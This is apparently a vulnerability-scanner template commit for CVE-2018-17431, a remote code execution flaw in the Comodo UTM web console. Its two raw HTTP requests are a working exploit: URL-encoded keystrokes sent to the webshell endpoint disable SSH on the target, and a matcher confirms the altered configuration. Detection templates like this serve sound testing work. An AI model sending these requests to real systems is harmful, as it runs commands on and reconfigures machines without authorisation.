🔥 Add CVE-2018-17431

cves/CVE-2018-17431.yaml

@@ -0,0 +1,33 @@
+id: cve-2018-17431
+
+info:
+  name: Comodo Unified Threat Management Web Console 2.7.0 - RCE
+  author: dwisiswant0
+  severity: critical
+  description: Comodo Firewall & Central Manager (UTM) All Release before 2.7.0 & 1.5.0 Remote Code Execution (Web Shell based)
+
+  # References:
+  # - https://www.exploit-db.com/exploits/48825
+  # - https://secure.comodo.com/home/purchase.php?pid=106&license=try&track=9276&af=9276
+
+requests:
+  - raw:
+      - |
+        GET /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 HTTP/1.1
+        Host: {{Hostname}}
+        Connection: close
+
+      - | # to triggering RCE
+        GET /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 HTTP/1.1
+        Host: {{Hostname}}
+        Connection: close
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Configuration has been altered"
+        part: body
+      - type: status
+        status:
+          - 200